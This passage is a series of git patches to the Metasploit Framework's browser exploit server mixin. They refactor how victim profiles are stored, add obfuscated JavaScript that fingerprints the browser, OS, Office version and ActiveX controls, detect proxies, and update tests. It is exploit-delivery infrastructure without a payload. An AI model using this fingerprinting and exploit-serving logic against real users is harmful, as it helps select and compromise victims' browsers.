     def update_profile(target_profile, key, value)
       sync do
-        target_profile[target_profile.first[0]][key] = value
+        target_profile[key] = value
       end
     end
 
@@ -159,7 +151,7 @@ module Msf
     #
     def init_profile(tag)
       sync do
-        @target_profiles << {tag => {}}
+        @target_profiles[tag] = {}
       end
     end
 
@@ -196,17 +188,17 @@ module Msf
 
       # Browser doesn't allow cookies. Can't track that, use a different way to track.
       init_profile(tag) if request.headers['Cookie'].blank?
-      target_profile = get_profile(tag)
+      target_info = get_profile(tag)
 
       # Gathering target info from the detection stage
       case source
       when :script
         # Gathers target data from a POST request
-        update_profile(target_profile, :source, 'script')
+        update_profile(target_info, :source, 'script')
         raw = Rex::Text.uri_decode(Rex::Text.decode_base64(request.body))
         raw.split('&').each do |item|
           k, v = item.scan(/(\w+)=(.*)/).flatten
-          update_profile(target_profile, k.to_sym, v)
+          update_profile(target_info, k.to_sym, v)
         end
 
       when :headers
@@ -216,21 +208,21 @@ module Msf
         # Module has all the info it needs, ua_string is kind of pointless.
         # Kill this to save space.
         fp.delete(:ua_string)
-        update_profile(target_profile, :source, 'headers')
+        update_profile(target_info, :source, 'headers')
         fp.each do |k, v|
-          update_profile(target_profile, k.to_sym, v)
+          update_profile(target_info, k.to_sym, v)
         end
       end
 
       # Other detections
-      update_profile(target_profile, :proxy, has_proxy?(request))
-      update_profile(target_profile, :language, request.headers['Accept-Language'] || '')
+      update_profile(target_info, :proxy, has_proxy?(request))
+      update_profile(target_info, :language, request.headers['Accept-Language'] || '')
 
       report_client({
         :host      => cli.peerhost,
         :ua_string => request.headers['User-Agent'],
-        :ua_name   => target_profile[tag]['ua_name'],
-        :ua_ver    => target_profile[tag]['ua_ver']
+        :ua_name   => target_info[:ua_name],
+        :ua_ver    => target_info[:ua_ver]
       })
     end
 
@@ -354,7 +346,7 @@ module Msf
         #
         tag = retreive_tag(request)
         profile = get_profile(tag)
-        if profile[tag][:tried] and datastore['Retries'] == false
+        if profile[:tried] and datastore['Retries'] == false
           print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")
           send_not_found(cli)
         else
@@ -404,9 +396,8 @@ module Msf
     # @return [String] The payload
     #
     def get_payload(cli, browser_info)
-      tag      = browser_info.first[0]
-      arch     = browser_info[tag][:arch]
-      platform = browser_info[tag][:os_name]
+      arch     = browser_info[:arch]
+      platform = browser_info[:os_name]
 
       # Fix names for consisntecy so our API can find the right one
       # Originally defined in lib/msf/core/constants.rb
diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index cc62abb682..ed4a4f55bd 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -97,18 +97,12 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
   describe ".init_profile" do
     it "should initialize an empety profile for tag 'random'" do
       server.init_profile(profile_name)
-      ivar_target_profile = server.instance_variable_get(:@target_profiles).first
-      ivar_target_profile[profile_name].should eq({})
+      ivar_target_profile = server.instance_variable_get(:@target_profiles)
+      ivar_target_profile.should eq({profile_name=>{}})
     end
   end
 
   describe ".get_profile" do
-    it "should only contain one hash for each profile" do
-      server.init_profile(profile_name)
-      p = server.get_profile(profile_name)
-      p.length.should eq(1)
-    end
-
     it "should return nil when a profile isn't found" do
       server.init_profile(profile_name)
       p = server.get_profile("non_existent_profile")
@@ -118,7 +112,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     it "should return a profile if found" do
       server.init_profile(profile_name)
       p = server.get_profile(profile_name)
-      p[profile_name].should_not be_nil
+      p.should eq({})
     end
   end
 
@@ -128,8 +122,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
       profile = server.get_profile(profile_name)
       server.update_profile(profile, :os_name, expected_os_name)
       profile = server.get_profile(profile_name)
-      os_name = profile[profile_name][:os_name]
-      os_name.should eq(expected_os_name)
+      profile[:os_name].should eq(expected_os_name)
     end
   end
 
diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index f85cdea45f..f05cbb1a0d 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -54,12 +54,11 @@ class Metasploit3 < Msf::Exploit::Remote
     <% msg = "This page is generated by an exploit" %>
     <%=msg%>
     <p></p>
-    You are tagged as: #{tag}<br>
-    Data gathered from source: #{target_info[tag][:source]}<br>
-    OS name: #{target_info[tag][:os_name]}<br>
-    Flavor: #{target_info[tag][:os_flavor]}<br>
-    UA name: #{target_info[tag][:ua_name]}<br>
-    UA version: #{target_info[tag][:ua_ver]}
+    Data gathered from source: #{target_info[:source]}<br>
+    OS name: #{target_info[:os_name]}<br>
+    Flavor: #{target_info[:os_flavor]}<br>
+    UA name: #{target_info[:ua_name]}<br>
+    UA version: #{target_info[:ua_ver]}
     |
   end
 
@@ -81,6 +80,6 @@ end
 
 Example of raw target_info:
 
-{"rMWwSAwBHLoESpHbEGbsv"=>{:source=>"script", :os_name=>"Microsoft Windows", :os_flavor=>"XP", :ua_name=>"MSIE", :ua_ver=>"8.0", :arch=>"x86", :office=>"null", :proxy=>false, :language=>"en-us", :tried=>true}}
+{:source=>"script", :os_name=>"Microsoft Windows", :os_flavor=>"XP", :ua_name=>"MSIE", :ua_ver=>"8.0", :arch=>"x86", :office=>"null", :proxy=>false, :language=>"en-us", :tried=>true}
 
 =end
\ No newline at end of file

From 844daf0e00ee448654bfbc4b65e597a749ec4410 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Mon, 4 Nov 2013 17:49:43 -0600
Subject: [PATCH 43/73] No regex for get_resource checking

---
 lib/msf/core/exploit/browser/server.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 7815529b51..efd599f154 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -309,7 +309,7 @@ module Msf
     #
     def on_request_uri(cli, request)
       case request.uri
-      when /^#{get_resource}$/
+      when get_resource
         #
         # This is the information gathering stage
         #

From 5f2d8358c002409d9cdb1a49e56d0963fa83bbe7 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Nov 2013 01:04:52 -0600
Subject: [PATCH 44/73] Be more browser specific with Javascript generation

---
 data/js/detect/{addons.js => ie_addons.js}    | 38 +++++++++++++++++++
 lib/msf/core/exploit/browser/server.rb        | 24 +++++++++---
 lib/msf/core/exploit/http/server.rb           | 14 +------
 lib/rex/exploitation/js/detect.rb             |  4 +-
 .../msf/core/exploit/browser/server_spec.rb   |  6 ++-
 5 files changed, 65 insertions(+), 21 deletions(-)
 rename data/js/detect/{addons.js => ie_addons.js} (53%)

diff --git a/data/js/detect/addons.js b/data/js/detect/ie_addons.js
similarity index 53%
rename from data/js/detect/addons.js
rename to data/js/detect/ie_addons.js
index 277c1fd469..c875195943 100644
--- a/data/js/detect/addons.js
+++ b/data/js/detect/ie_addons.js
@@ -1,5 +1,43 @@
 window.addons_detect = { };
 
+/**
+ * Returns true if this ActiveX is available, otherwise false.
+ * Grabbed this directly from browser_autopwn.rb
+ **/
+window.addons_detect.hasActiveX = function (axo_name, method) {
+  var axobj = null;
+  if (axo_name.substring(0,1) == String.fromCharCode(123)) {
+    axobj = document.createElement("object");
+    axobj.setAttribute("classid", "clsid:" + axo_name);
+    axobj.setAttribute("id", axo_name);
+    axobj.setAttribute("style", "visibility: hidden");
+    axobj.setAttribute("width", "0px");
+    axobj.setAttribute("height", "0px");
+    document.body.appendChild(axobj);
+    if (typeof(axobj[method]) == 'undefined') {
+      var attributes = 'id="' + axo_name + '"';
+      attributes += ' classid="clsid:' + axo_name + '"';
+      attributes += ' style="visibility: hidden"';
+      attributes += ' width="0px" height="0px"';
+      document.body.innerHTML += "<object " + attributes + "></object>";
+      axobj = document.getElementById(axo_name);
+    }
+  } else {
+    try {
+      axobj = new ActiveXObject(axo_name);
+    } catch(e) {
+      // If we can't build it with an object tag and we can't build it
+      // with ActiveXObject, it can't be built.
+      return false;
+    };
+  }
+  if (typeof(axobj[method]) != 'undefined') {
+    return true;
+  }
+
+  return false;
+};
+
 /**
  * Returns the version of Microsoft Office. If not found, returns null.
  **/
diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index efd599f154..e66ea40fad 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -255,14 +255,19 @@ module Msf
     #
     # Returns the code for client-side detection
     #
-    # @param [String] Returns the HTML for detection
+    # @param user_agent [String] The user-agent of the browser
+    # @return [String] Returns the HTML for detection
     #
-    def get_detection_html
+    def get_detection_html(user_agent)
+      ua_info = fingerprint_user_agent(user_agent)
+      os      = ua_info[:os_name]
+      client  = ua_info[:ua_name]
+
       js = ::Rex::Exploitation::JSObfu.new %Q|
       #{js_base64}
       #{js_os_detect}
-      #{js_addons_detect}
       #{js_ajax_post}
+      #{js_ie_addons_detect if os == OperatingSystems::WINDOWS and client == HttpClients::IE}
 
       function objToQuery(obj) {
         var q = [];
@@ -279,9 +284,15 @@ module Msf
           "os_flavor" : osInfo.os_flavor,
           "ua_name"   : osInfo.ua_name,
           "ua_ver"    : osInfo.ua_version,
-          "arch"      : osInfo.arch,
-          "office"    : window.addons_detect.getMsOfficeVersion()
+          "arch"      : osInfo.arch
         };
+
+        #{
+          if os == OperatingSystems::WINDOWS and client == HttpClients::IE
+            "d['office'] = window.addons_detect.getMsOfficeVersion();"
+          end
+        }
+
         var query = objToQuery(d);
         postInfo("#{get_resource}/#{@info_receiver_page}/", query);
         window.location = "#{get_resource}/#{@exploit_receiver_page}/";
@@ -320,8 +331,9 @@ module Msf
 
         print_status("Gathering target information.")
         tag = Rex::Text.rand_text_alpha(rand(20) + 5)
+        ua = request.headers['User-Agent']
         init_profile(tag)
-        html = get_detection_html
+        html = get_detection_html(ua)
         send_response(cli, html, {'Set-Cookie' => tag})
 
       when /#{@info_receiver_page}/
diff --git a/lib/msf/core/exploit/http/server.rb b/lib/msf/core/exploit/http/server.rb
index f34eb9c14a..40d7f9593b 100644
--- a/lib/msf/core/exploit/http/server.rb
+++ b/lib/msf/core/exploit/http/server.rb
@@ -678,16 +678,6 @@ protected
         OptEnum.new('HTML::base64', [false, 'Enable HTML obfuscation via an embeded base64 html object (IE not supported)', 'none', ['none', 'plain', 'single_pad', 'double_pad', 'random_space_injection']]),
         OptInt.new('HTML::javascript::escape', [false, 'Enable HTML obfuscation via HTML escaping (number of iterations)',  0]),
       ], Exploit::Remote::HttpServer::HTML)
-
-    # Cache Javascript
-    @cache_base64         = nil
-    @cache_ajax_download  = nil
-    @cache_ajax_post      = nil
-    @cache_mstime_malloc  = nil
-    @cache_property_spray = nil
-    @cache_heap_spray     = nil
-    @cache_os_detect      = nil
-    @cache_os_addons      = nil
   end
 
   #
@@ -823,8 +813,8 @@ protected
     @cache_os_detect ||= ::Rex::Exploitation::Js::Detect.os
   end
 
-  def js_addons_detect
-    @cache_addons_detect ||= ::Rex::Exploitation::Js::Detect.addons
+  def js_ie_addons_detect
+    @cache_ie_addons_detect ||= ::Rex::Exploitation::Js::Detect.ie_addons
   end
 
   # Transmits a html response to the supplied client
diff --git a/lib/rex/exploitation/js/detect.rb b/lib/rex/exploitation/js/detect.rb
index c7f659f357..feda40ef0a 100644
--- a/lib/rex/exploitation/js/detect.rb
+++ b/lib/rex/exploitation/js/detect.rb
@@ -43,9 +43,9 @@ class Detect
   #
   # getMsOfficeVersion(): Returns the version for Microsoft Office
   #
-  def self.addons(custom_js = '')
+  def self.ie_addons(custom_js = '')
     js  = custom_js
-    js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "addons.js"))
+    js << ::File.read(::File.join(Msf::Config.data_directory, "js", "detect", "ie_addons.js"))
 
     Rex::Exploitation::JSObfu.new(js)
   end
diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index ed4a4f55bd..3087b90eca 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -27,6 +27,10 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     "linux"
   end
 
+  let(:expected_user_agent) do
+    "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"
+  end
+
   before do
     Rex::ServiceManager.stub(:start => service_double)
   end
@@ -128,7 +132,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
 
   describe ".get_detection_html" do
     it "should return the detection code that the client will get" do
-      html = server.get_detection_html
+      html = server.get_detection_html(expected_user_agent)
       html.should_not eq('')
     end
   end

From 73e72a6488a9be9cccec13d00341f5a7cf543093 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Nov 2013 01:14:12 -0600
Subject: [PATCH 45/73] Update the detect_spec testcase

---
 spec/lib/rex/exploitation/js/detect_spec.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/spec/lib/rex/exploitation/js/detect_spec.rb b/spec/lib/rex/exploitation/js/detect_spec.rb
index d029f0a5e1..93b698f108 100644
--- a/spec/lib/rex/exploitation/js/detect_spec.rb
+++ b/spec/lib/rex/exploitation/js/detect_spec.rb
@@ -11,9 +11,9 @@ describe Rex::Exploitation::Js::Detect do
       end
     end
 
-    context ".addons" do
-      it "should load the Addons Detect javascript" do
-        js = Rex::Exploitation::Js::Detect.addons.to_s
+    context ".ie_addons" do
+      it "should load the IE Addons Detect javascript" do
+        js = Rex::Exploitation::Js::Detect.ie_addons.to_s
         js.should =~ /window\.addons_detect/
       end
     end

From 8fb2b943be640d21e520353069d35a8b165ec7fe Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Nov 2013 01:34:56 -0600
Subject: [PATCH 46/73] Add ActiveX detection

---
 lib/msf/core/exploit/browser/server.rb | 11 ++++++++++-
 1 file changed, 10 insertions(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index e66ea40fad..9ddff02248 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -121,6 +121,7 @@ module Msf
     #
     # If the source is 'script', the profile might have even more information about plugins:
     # 'office'  : The version of Microsoft Office (IE only)
+    # 'activex' : Whether a specific method is available from an ActiveX control (IE only)
     #
     # @param tag [String] Either a cookie or IP + User-Agent
     # @return [Hash] The profile found. If not found, returns nil
@@ -289,7 +290,15 @@ module Msf
 
         #{
           if os == OperatingSystems::WINDOWS and client == HttpClients::IE
-            "d['office'] = window.addons_detect.getMsOfficeVersion();"
+            ie_js = "d['office'] = window.addons_detect.getMsOfficeVersion();"
+
+            clsid  = @requirements[:clsid]
+            method = @requirements[:method] 
+            if clsid and method
+              ie_js << "d['activex'] = window.addons_detect.hasActiveX('#{clsid}', '#{method}');"
+            end
+
+            ie_js
           end
         }
 

From 9d1742ac475bd0e27194b936331f0a1b25423cc5 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Nov 2013 10:15:53 -0600
Subject: [PATCH 47/73] Fix typos

---
 lib/msf/core/exploit/browser/server.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 9ddff02248..794dfcb68e 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -5,7 +5,7 @@ require 'rex/exploitation/js'
 
 ###
 #
-# The BrowserExploitServer mixin provides methods to acheive common tasks seen in modern browser
+# The BrowserExploitServer mixin provides methods to do common tasks seen in modern browser
 # exploitation, and is designed to work against common setups such as on Windows, OSX, and Linux.
 #
 ###
@@ -20,7 +20,7 @@ module Msf
     def initialize(info={})
       super
 
-      # See get_profile's documenation to understand what @target_profiles stores
+      # See get_profile's documentation to understand what @target_profiles stores
       @target_profiles = {}
 
       # Requirements are conditions that the browser must have in order to be exploited.
@@ -109,7 +109,7 @@ module Msf
     # }
     # A profile should at least have info about the following:
     # :source  : The data source. Either from 'script', or 'headers'. The 'script' source
-    #             should be more accureate in some scenarios like browser compatibility mode
+    #             should be more accurate in some scenarios like browser compatibility mode
     # :ua_name : The name of the browser
     # :ua_ver  : The version of the browser
     # :os_name : The name of the OS
@@ -164,7 +164,7 @@ module Msf
     #
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     #
-    def retreive_tag(request)
+    def retrieve_tag(request)
       tag = request.headers['Cookie'].to_s
 
       if tag.blank?
@@ -185,7 +185,7 @@ module Msf
     # @param request [Rex::Proto::Http::Request] The HTTP request sent by the browser
     #
     def process_browser_info(source, cli, request)
-      tag = retreive_tag(request)
+      tag = retrieve_tag(request)
 
       # Browser doesn't allow cookies. Can't track that, use a different way to track.
       init_profile(tag) if request.headers['Cookie'].blank?
@@ -204,7 +204,7 @@ module Msf
 
       when :headers
         # Gathers target data from headers
-        # This may be less accureate, and most likely less info.
+        # This may be less accurate, and most likely less info.
         fp = fingerprint_user_agent(request.headers['User-Agent'])
         # Module has all the info it needs, ua_string is kind of pointless.
         # Kill this to save space.

From 0513dad789b69724b8cd908c416f046bbbd4fb6f Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Nov 2013 10:30:37 -0600
Subject: [PATCH 48/73] -_-

---
 lib/msf/core/exploit/browser/server.rb | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 794dfcb68e..26fc1bff63 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -13,7 +13,6 @@ require 'rex/exploitation/js'
 module Msf
   module Exploit::Remote::BrowserExploitServer
 
-    include Msf::Exploit::Remote::HttpServer
     include Msf::Exploit::Remote::HttpServer::HTML
     include Msf::Exploit::RopDb
 
@@ -250,7 +249,11 @@ module Msf
         CLIENT_IP
         FORWARDED_FOR_IP
         HTTP_PROXY_CONNECTION
-      }.include?(request.headers[name])
+      }.each do |name|
+        return true if request.headers[name]
+      end
+
+      false
     end
 
     #

From 9c6b187cc68cbdfa4735dab9699222806d584622 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Nov 2013 11:05:33 -0600
Subject: [PATCH 49/73] stuff

---
 lib/msf/core/exploit/browser/server.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 26fc1bff63..872cb78527 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -336,7 +336,7 @@ module Msf
         #
         # This is the information gathering stage
         #
-        if get_profile(retreive_tag(request))
+        if get_profile(retrieve_tag(request))
           send_redirect(cli, "#{get_resource}/#{@exploit_receiver_page}")
           return
         end
@@ -368,7 +368,7 @@ module Msf
         # This sends the actual exploit. A module should define its own
         # on_request_exploit() to get the target information
         #
-        tag = retreive_tag(request)
+        tag = retrieve_tag(request)
         profile = get_profile(tag)
         if profile[:tried] and datastore['Retries'] == false
           print_status("Target with tag \"#{tag}\" wants to retry the module, not allowed.")

From 90b91ec2cd2cacc3dbfc5aa85d83b11d36c58343 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Nov 2013 12:53:16 -0600
Subject: [PATCH 50/73] Add testcase for on_request_exploit

---
 spec/lib/msf/core/exploit/browser/server_spec.rb | 11 +++++++++++
 1 file changed, 11 insertions(+)

diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 3087b90eca..39080b136f 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -137,4 +137,15 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
   end
 
+  describe ".on_request_exploit" do
+    it "should raise a NoMethodError if called" do
+      fake_cli = nil
+      fake_request = nil
+      fake_browser_info = nil
+      lambda {
+        server.on_request_exploit(fake_cli, fake_request, fake_browser_info)
+      }.should raise_error
+    end
+  end
+
 end
\ No newline at end of file

From 73701462ed37bca3785194ea6b04b61d36a0ff0d Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Nov 2013 16:26:41 -0600
Subject: [PATCH 51/73] Fix ActiveX. Use ERB for Javascript detection code.

---
 lib/msf/core/exploit/browser/server.rb        | 74 +++++++++----------
 .../msf/core/exploit/browser/server_spec.rb   | 22 +-----
 .../exploits/test/browserexploitserver.rb     | 23 +++---
 3 files changed, 46 insertions(+), 73 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 872cb78527..2d5f87edc8 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -23,9 +23,15 @@ module Msf
       @target_profiles = {}
 
       # Requirements are conditions that the browser must have in order to be exploited.
-      # They must be defined by the module, and the mixin should check them before the
-      # exploit is actually deployed.
-      @requirements = {}
+      # Baisc requirements include:
+      # :source   The data source. Either 'script' or 'headers'
+      # :ua_name  The name of the browser
+      # :ua_ver   The version of the browser
+      # :os_name  The name of the operating system
+      # :language The language of the system
+      # :arch     The architecture
+      # :prxy     Indicates whether a proxy is used or not by the browser
+      @requirements = self.module_info['Requirements'] || {}
 
       @info_receiver_page     = "info"
       @exploit_receiver_page  = "exploit"
@@ -62,22 +68,6 @@ module Msf
       "#{get_resource}/#{@exploit_receiver_page}"
     end
 
-    #
-    # Defines requirements by the module. Main keys are the same as the ones in @target_profiles.
-    #
-    # @param reqs [Hash]
-    # @option reqs :source The data source. Either 'script' or 'headers'
-    # @option reqs :ua_name The name of the browser
-    # @option reqs :ua_ver The version of the browser
-    # @option reqs :os_name The name of the operating system
-    # @option reqs :language The language of the system
-    # @option reqs :arch The architecture
-    # @option reqs :prxy Indicates whether a proxy is used or not by the browser
-    #
-    def requirements(reqs={})
-      @requirements = reqs
-    end
-
     #
     # Returns an array of items that do not meet the requirements
     #
@@ -87,6 +77,15 @@ module Msf
     def get_bad_requirements(profile)
       bad_reqs = []
 
+      # At this point the check is already done.
+      # If :activex is true, that means the clsid + method had a match,
+      # if not, then false.
+      if @requirements[:clsid] and @requirements[:method]
+        @requirements.delete(:clsid)
+        @requirements.delete(:method)
+        @requirements[:activex] = 'true' # Script passes boolean as string
+      end
+
       @requirements.each do |k, v|
         if v.class == Regexp
           bad_reqs << k if profile[k] !~ v
@@ -267,11 +266,11 @@ module Msf
       os      = ua_info[:os_name]
       client  = ua_info[:ua_name]
 
-      js = ::Rex::Exploitation::JSObfu.new %Q|
-      #{js_base64}
-      #{js_os_detect}
-      #{js_ajax_post}
-      #{js_ie_addons_detect if os == OperatingSystems::WINDOWS and client == HttpClients::IE}
+      code = ERB.new(%Q|
+      <%= js_base64 %>
+      <%= js_os_detect %>
+      <%= js_ajax_post %>
+      <%= js_ie_addons_detect if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
 
       function objToQuery(obj) {
         var q = [];
@@ -291,27 +290,26 @@ module Msf
           "arch"      : osInfo.arch
         };
 
-        #{
-          if os == OperatingSystems::WINDOWS and client == HttpClients::IE
-            ie_js = "d['office'] = window.addons_detect.getMsOfficeVersion();"
-
+        <% if os == OperatingSystems::WINDOWS and client == HttpClients::IE %>
+          d['office'] = window.addons_detect.getMsOfficeVersion();
+          <%
             clsid  = @requirements[:clsid]
-            method = @requirements[:method] 
+            method = @requirements[:method]
             if clsid and method
-              ie_js << "d['activex'] = window.addons_detect.hasActiveX('#{clsid}', '#{method}');"
-            end
-
-            ie_js
-          end
-        }
+          %>
+          d['activex'] = window.addons_detect.hasActiveX('<%=clsid%>', '<%=method%>');
+          <% end %>
+        <% end %>
 
         var query = objToQuery(d);
-        postInfo("#{get_resource}/#{@info_receiver_page}/", query);
-        window.location = "#{get_resource}/#{@exploit_receiver_page}/";
+        postInfo("<%=get_resource%>/<%=@info_receiver_page%>/", query);
+        window.location = "<%=get_resource%>/<%=@exploit_receiver_page%>/";
       }
-      |
+      |).result(binding())
 
+      js = ::Rex::Exploitation::JSObfu.new code
       js.obfuscate
+      js = code
 
       %Q|
       <script>
diff --git a/spec/lib/msf/core/exploit/browser/server_spec.rb b/spec/lib/msf/core/exploit/browser/server_spec.rb
index 39080b136f..b58f9d0163 100644
--- a/spec/lib/msf/core/exploit/browser/server_spec.rb
+++ b/spec/lib/msf/core/exploit/browser/server_spec.rb
@@ -47,26 +47,6 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
     end
   end
 
-  describe ".requirements" do
-    let (:actual_requirements) do
-      server.instance_variable_get(:@requirements)
-    end
-
-    it "should begin with an empty hash by default" do
-      actual_requirements.should eq({})
-    end
-
-    it "should have these requirements: script or headers for source, and windows for OS" do
-      opts = {
-        :source  => /script|headers/i,
-        :os_name => /win/i
-      }
-
-      server.requirements(opts)
-      actual_requirements.should eq(opts)
-    end
-  end
-
   describe ".get_bad_requirements" do
     it "should not contain any bad requirements" do
       fake_profile = {
@@ -92,7 +72,7 @@ describe Msf::Exploit::Remote::BrowserExploitServer do
           :os_name   => expected_os_name
         }}
 
-      server.requirements({:os_name=>/win/i})
+      server.instance_variable_set(:@requirements, {:os_name => /win/i})
       baddies = server.get_bad_requirements(fake_profile)
       baddies.should eq([:os_name])
     end
diff --git a/test/modules/exploits/test/browserexploitserver.rb b/test/modules/exploits/test/browserexploitserver.rb
index f05cbb1a0d..f74a6efb35 100644
--- a/test/modules/exploits/test/browserexploitserver.rb
+++ b/test/modules/exploits/test/browserexploitserver.rb
@@ -26,6 +26,13 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'URL', 'http://metasploit.com' ]
         ],
       'Platform'       => 'win',
+      'Requirements'   =>
+        {
+          :source => /script|headers/i,
+          #:clsid  => "{D27CDB6E-AE6D-11cf-96B8-444553540000}", # ShockwaveFlash.ShockwaveFlash.1
+          #:method => "LoadMovie"
+          #:os_name => /win/i
+        },
       'Targets'        =>
         [
           [ 'Automatic', {} ]
@@ -38,18 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Apr 1 2013",
       'DefaultTarget'  => 0))
-
-    # You can see what you can see by doing this in on_request_exploit():
-    # print_debug(target_info.inspect)
-    # This example is for windows only
-    requirements({
-      :source  => /script|headers/i,
-      :os_name => /win/i
-    })
   end
 
   def exploit_template(target_info)
-    tag = target_info.first[0]
     %Q|
     <% msg = "This page is generated by an exploit" %>
     <%=msg%>
@@ -58,7 +56,8 @@ class Metasploit3 < Msf::Exploit::Remote
     OS name: #{target_info[:os_name]}<br>
     Flavor: #{target_info[:os_flavor]}<br>
     UA name: #{target_info[:ua_name]}<br>
-    UA version: #{target_info[:ua_ver]}
+    UA version: #{target_info[:ua_ver]}<br>
+    Office version: #{target_info[:office]}
     |
   end
 
@@ -69,7 +68,6 @@ class Metasploit3 < Msf::Exploit::Remote
     send_exploit_html(cli, exploit_template(target_info))
   end
 
-
   def exploit
     super
   end
@@ -77,9 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
 end
 
 =begin
-
 Example of raw target_info:
-
 {:source=>"script", :os_name=>"Microsoft Windows", :os_flavor=>"XP", :ua_name=>"MSIE", :ua_ver=>"8.0", :arch=>"x86", :office=>"null", :proxy=>false, :language=>"en-us", :tried=>true}
-
 =end
\ No newline at end of file

From 63d3c7e8bb1e89290e0f3fc6a2f82c5f04c7e2e2 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Tue, 5 Nov 2013 16:33:36 -0600
Subject: [PATCH 52/73] Put proxy headers in a constant

---
 lib/msf/core/exploit/browser/server.rb | 43 +++++++++++++-------------
 1 file changed, 21 insertions(+), 22 deletions(-)

diff --git a/lib/msf/core/exploit/browser/server.rb b/lib/msf/core/exploit/browser/server.rb
index 2d5f87edc8..e33277fd04 100644
--- a/lib/msf/core/exploit/browser/server.rb
+++ b/lib/msf/core/exploit/browser/server.rb
@@ -16,6 +16,25 @@ module Msf
     include Msf::Exploit::Remote::HttpServer::HTML
     include Msf::Exploit::RopDb
 
+    PROXY_REQUEST_HEADER_SET = Set.new(
+      %w{
+         CLIENT_IP
+         FORWARDED
+         FORWARDED_FOR
+         FORWARDED_FOR_IP
+         HTTP_CLIENT_IP
+         HTTP_FORWARDED
+         HTTP_FORWARDED_FOR
+         HTTP_FORWARDED_FOR_IP
+         HTTP_PROXY_CONNECTION
+         HTTP_VIA
+         HTTP_X_FORWARDED
+         HTTP_X_FORWARDED_FOR
+         VIA
+         X_FORWARDED
+         X_FORWARDED_FOR
+      })
+
     def initialize(info={})
       super
 
@@ -232,27 +251,8 @@ module Msf
     # @return [Boolean] True if found, otherwise false
     #
     def has_proxy?(request)
-      %w{
-        HTTP_VIA
-        HTTP_X_FORWARDED_FOR
-        HTTP_FORWARDED_FOR
-        HTTP_X_FORWARDED
-        HTTP_FORWARDED
-        HTTP_CLIENT_IP
-        HTTP_FORWARDED_FOR_IP
-        VIA
-        X_FORWARDED_FOR
-        FORWARDED_FOR
